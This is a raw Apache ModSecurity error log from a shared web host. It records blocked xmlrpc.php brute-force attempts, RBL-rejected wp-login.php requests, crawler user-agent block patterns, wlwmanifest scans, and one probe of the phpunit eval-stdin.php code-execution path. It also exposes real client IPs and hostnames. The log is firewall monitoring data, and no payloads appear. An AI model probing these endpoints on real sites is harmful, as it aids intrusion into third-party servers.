[Tue May 26 19:30:10.944051 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:9417] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnauzJzkdc0WtdrwtqwwAAANU"]
[Tue May 26 19:30:10.944165 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:9417] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnauzJzkdc0WtdrwtqwwAAANU"]
[Tue May 26 19:30:11.638231 2026] [security2:error] [pid 49598:tid 49798] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWna-zJzkdc0Wtdrwtq0QAAAMs"]
[Tue May 26 19:30:11.738472 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:48283] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWna-zJzkdc0Wtdrwtq3wAAAJw"]
[Tue May 26 19:30:11.738635 2026] [security2:error] [pid 49598:tid 49751] [client 91.245.236.124:48283] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWna-zJzkdc0Wtdrwtq3wAAAJw"]
[Tue May 26 19:30:12.512582 2026] [security2:error] [pid 49598:tid 49833] [client 91.245.236.124:20339] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnbOzJzkdc0Wtdrwtq7QAAAO4"]
[Tue May 26 19:30:12.512717 2026] [security2:error] [pid 49598:tid 49833] [client 91.245.236.124:20339] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnbOzJzkdc0Wtdrwtq7QAAAO4"]
[Tue May 26 19:30:13.262508 2026] [security2:error] [pid 49598:tid 49799] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnbOzJzkdc0Wtdrwtq-wAAAMw"]
[Tue May 26 19:30:13.295600 2026] [security2:error] [pid 49598:tid 49739] [client 91.245.236.124:53251] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnbezJzkdc0WtdrwtrCQAAAJA"]
[Tue May 26 19:30:13.295748 2026] [security2:error] [pid 49598:tid 49739] [client 91.245.236.124:53251] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnbezJzkdc0WtdrwtrCQAAAJA"]
[Tue May 26 19:30:13.940926 2026] [security2:error] [pid 49598:tid 49814] [client 134.122.120.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahWnbezJzkdc0WtdrwtrGQAAANs"], referer: http://bigpapaairbnbhotel.com/
[Tue May 26 19:30:14.071374 2026] [security2:error] [pid 49598:tid 49752] [client 91.245.236.124:16695] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnbuzJzkdc0WtdrwtrHgAAAJ0"]
[Tue May 26 19:30:14.071496 2026] [security2:error] [pid 49598:tid 49752] [client 91.245.236.124:16695] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnbuzJzkdc0WtdrwtrHgAAAJ0"]
[Tue May 26 19:30:14.838156 2026] [security2:error] [pid 49598:tid 49777] [client 91.245.236.124:51679] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnbuzJzkdc0WtdrwtrMwAAALY"]
[Tue May 26 19:30:14.838295 2026] [security2:error] [pid 49598:tid 49777] [client 91.245.236.124:51679] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnbuzJzkdc0WtdrwtrMwAAALY"]
[Tue May 26 19:30:15.491256 2026] [security2:error] [pid 49598:tid 49813] [client 74.7.175.162:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "glorodbalsa.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWnb-zJzkdc0WtdrwtrSQAAANo"]
[Tue May 26 19:30:15.491960 2026] [security2:error] [pid 49598:tid 49730] [client 74.7.175.162:43258] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "glorodbalsa.com"] [uri "/robots.txt"] [unique_id "ahWnb-zJzkdc0WtdrwtrRQAAh0M"]
[Tue May 26 19:30:15.492015 2026] [security2:error] [pid 49598:tid 49804] [client 74.7.241.175:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "glorodavionics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWnb-zJzkdc0WtdrwtrSwAAANE"]
[Tue May 26 19:30:15.493119 2026] [security2:error] [pid 49598:tid 49835] [client 74.7.241.175:40992] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahWnb-zJzkdc0WtdrwtrRAAA8Cw"]
[Tue May 26 19:30:15.582661 2026] [security2:error] [pid 49598:tid 49781] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnb-zJzkdc0WtdrwtrPAAAALo"]
[Tue May 26 19:30:15.597587 2026] [security2:error] [pid 49598:tid 49832] [client 74.7.228.11:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "glorodrc.com"] [uri "/index.php"] [unique_id "ahWnb-zJzkdc0WtdrwtrSgAAAO0"]
[Tue May 26 19:30:15.599367 2026] [security2:error] [pid 49598:tid 49846] [client 74.7.228.11:60938] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "glorodrc.com"] [uri "/robots.txt"] [unique_id "ahWnb-zJzkdc0WtdrwtrQgAA-1g"]
[Tue May 26 19:30:15.624233 2026] [security2:error] [pid 49598:tid 49841] [client 91.245.236.124:43403] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnb-zJzkdc0WtdrwtrUwAAAPY"]
[Tue May 26 19:30:15.624414 2026] [security2:error] [pid 49598:tid 49841] [client 91.245.236.124:43403] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnb-zJzkdc0WtdrwtrUwAAAPY"]
[Tue May 26 19:30:15.634748 2026] [autoindex:error] [pid 49598:tid 49751] [client 74.7.227.176:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:30:16.393595 2026] [security2:error] [pid 49598:tid 49802] [client 91.245.236.124:28559] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWncOzJzkdc0WtdrwtreAAAAM8"]
[Tue May 26 19:30:16.393733 2026] [security2:error] [pid 49598:tid 49802] [client 91.245.236.124:28559] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWncOzJzkdc0WtdrwtreAAAAM8"]
[Tue May 26 19:30:17.158402 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:47597] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWncezJzkdc0WtdrwtrjQAAAIo"]
[Tue May 26 19:30:17.158523 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:47597] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWncezJzkdc0WtdrwtrjQAAAIo"]
[Tue May 26 19:30:17.922481 2026] [security2:error] [pid 49598:tid 49817] [client 91.245.236.124:27963] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWncezJzkdc0WtdrwtrowAAAN4"]
[Tue May 26 19:30:17.922607 2026] [security2:error] [pid 49598:tid 49817] [client 91.245.236.124:27963] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWncezJzkdc0WtdrwtrowAAAN4"]
[Tue May 26 19:30:18.158015 2026] [security2:error] [pid 49598:tid 49850] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWncezJzkdc0WtdrwtrlgAAAP8"]
[Tue May 26 19:30:18.688182 2026] [security2:error] [pid 49598:tid 49828] [client 91.245.236.124:41935] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWncuzJzkdc0WtdrwtruAAAAOk"]
[Tue May 26 19:30:18.688297 2026] [security2:error] [pid 49598:tid 49828] [client 91.245.236.124:41935] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWncuzJzkdc0WtdrwtruAAAAOk"]
[Tue May 26 19:30:19.466691 2026] [security2:error] [pid 49598:tid 49848] [client 91.245.236.124:53283] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnc-zJzkdc0WtdrwtrzgAAAP0"]
[Tue May 26 19:30:19.466809 2026] [security2:error] [pid 49598:tid 49848] [client 91.245.236.124:53283] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnc-zJzkdc0WtdrwtrzgAAAP0"]
[Tue May 26 19:30:20.109732 2026] [security2:error] [pid 49598:tid 49812] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnc-zJzkdc0Wtdrwtr2AAAANk"]
[Tue May 26 19:30:20.727639 2026] [security2:error] [pid 49598:tid 49819] [client 91.245.236.124:40557] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWndOzJzkdc0Wtdrwtr6wAAAOA"]
[Tue May 26 19:30:20.727846 2026] [security2:error] [pid 49598:tid 49819] [client 91.245.236.124:40557] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWndOzJzkdc0Wtdrwtr6wAAAOA"]
[Tue May 26 19:30:21.494481 2026] [security2:error] [pid 49598:tid 49748] [client 91.245.236.124:27347] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWndezJzkdc0WtdrwtsGwAAAJk"]
[Tue May 26 19:30:21.494577 2026] [security2:error] [pid 49598:tid 49748] [client 91.245.236.124:27347] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWndezJzkdc0WtdrwtsGwAAAJk"]
[Tue May 26 19:30:22.261148 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:35685] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnduzJzkdc0WtdrwtsLgAAANo"]
[Tue May 26 19:30:22.261304 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:35685] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnduzJzkdc0WtdrwtsLgAAANo"]
[Tue May 26 19:30:22.413547 2026] [security2:error] [pid 49598:tid 49850] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWndezJzkdc0WtdrwtsJAAAAP8"]
[Tue May 26 19:30:23.025150 2026] [security2:error] [pid 49598:tid 49766] [client 91.245.236.124:29569] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnd-zJzkdc0WtdrwtsRwAAAKs"]
[Tue May 26 19:30:23.025290 2026] [security2:error] [pid 49598:tid 49766] [client 91.245.236.124:29569] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnd-zJzkdc0WtdrwtsRwAAAKs"]
[Tue May 26 19:30:23.209561 2026] [security2:error] [pid 49598:tid 49738] [client 102.129.255.177:63339] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "208.91.198.65"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahWnd-zJzkdc0WtdrwtsSAAAAI8"]
[Tue May 26 19:30:23.291867 2026] [security2:error] [pid 49598:tid 49782] [client 114.119.155.144:53043] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gciamd.org.in"] [uri "/robots.txt"] [unique_id "ahWnd-zJzkdc0WtdrwtsTwAAALs"]
[Tue May 26 19:30:23.806161 2026] [security2:error] [pid 49598:tid 49763] [client 91.245.236.124:45329] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnd-zJzkdc0WtdrwtsYgAAAKg"]
[Tue May 26 19:30:23.806293 2026] [security2:error] [pid 49598:tid 49763] [client 91.245.236.124:45329] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnd-zJzkdc0WtdrwtsYgAAAKg"]
[Tue May 26 19:30:24.573091 2026] [security2:error] [pid 49598:tid 49833] [client 91.245.236.124:49997] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWneOzJzkdc0WtdrwtsdgAAAO4"]
[Tue May 26 19:30:24.573272 2026] [security2:error] [pid 49598:tid 49833] [client 91.245.236.124:49997] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWneOzJzkdc0WtdrwtsdgAAAO4"]
[Tue May 26 19:30:24.731829 2026] [security2:error] [pid 49598:tid 49825] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWneOzJzkdc0WtdrwtscAAAAOY"]
[Tue May 26 19:30:25.357821 2026] [security2:error] [pid 49598:tid 49738] [client 91.245.236.124:38827] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWneezJzkdc0WtdrwtsjgAAAI8"]
[Tue May 26 19:30:25.357938 2026] [security2:error] [pid 49598:tid 49738] [client 91.245.236.124:38827] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWneezJzkdc0WtdrwtsjgAAAI8"]
[Tue May 26 19:30:25.466938 2026] [security2:error] [pid 49598:tid 49602] [remote 123.30.233.13:52880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWneezJzkdc0WtdrwtsiwAA5wM"]
[Tue May 26 19:30:25.654523 2026] [security2:error] [pid 49598:tid 49755] [client 35.255.164.74:49699] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "wpdev.wrapmachines.com"] [uri "/index.php"] [unique_id "ahWneezJzkdc0WtdrwtskQAAAKA"]
[Tue May 26 19:30:25.869999 2026] [security2:error] [pid 49598:tid 49839] [client 35.255.164.74:49699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.164.255.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "wpdev.wrapmachines.com"] [uri "/xmlrpc.php"] [unique_id "ahWneezJzkdc0WtdrwtsmAAAAPQ"]
[Tue May 26 19:30:26.120749 2026] [security2:error] [pid 49598:tid 49759] [client 91.245.236.124:33571] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWneuzJzkdc0WtdrwtspAAAAKQ"]
[Tue May 26 19:30:26.120881 2026] [security2:error] [pid 49598:tid 49759] [client 91.245.236.124:33571] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWneuzJzkdc0WtdrwtspAAAAKQ"]
[Tue May 26 19:30:26.451023 2026] [security2:error] [pid 49598:tid 49612] [remote 123.30.233.13:52880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWneuzJzkdc0WtdrwtsrgAA5g0"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:30:26.519230 2026] [security2:error] [pid 49598:tid 49830] [client 35.255.164.74:51674] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWneuzJzkdc0WtdrwtssAAAAOs"]
[Tue May 26 19:30:26.742715 2026] [security2:error] [pid 49598:tid 49807] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWneuzJzkdc0WtdrwtsrQAAANQ"]
[Tue May 26 19:30:26.877876 2026] [security2:error] [pid 49598:tid 49736] [client 35.255.164.74:59577] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWneuzJzkdc0WtdrwtstwAAAI0"]
[Tue May 26 19:30:26.888118 2026] [security2:error] [pid 49598:tid 49797] [client 91.245.236.124:25539] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWneuzJzkdc0WtdrwtsuAAAAMo"]
[Tue May 26 19:30:26.888202 2026] [security2:error] [pid 49598:tid 49797] [client 91.245.236.124:25539] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWneuzJzkdc0WtdrwtsuAAAAMo"]
[Tue May 26 19:30:27.170106 2026] [security2:error] [pid 49598:tid 49738] [client 35.255.164.74:54253] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWne-zJzkdc0WtdrwtsvwAAAI8"]
[Tue May 26 19:30:27.668933 2026] [security2:error] [pid 49598:tid 49780] [client 91.245.236.124:17037] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWne-zJzkdc0WtdrwtszQAAALk"]
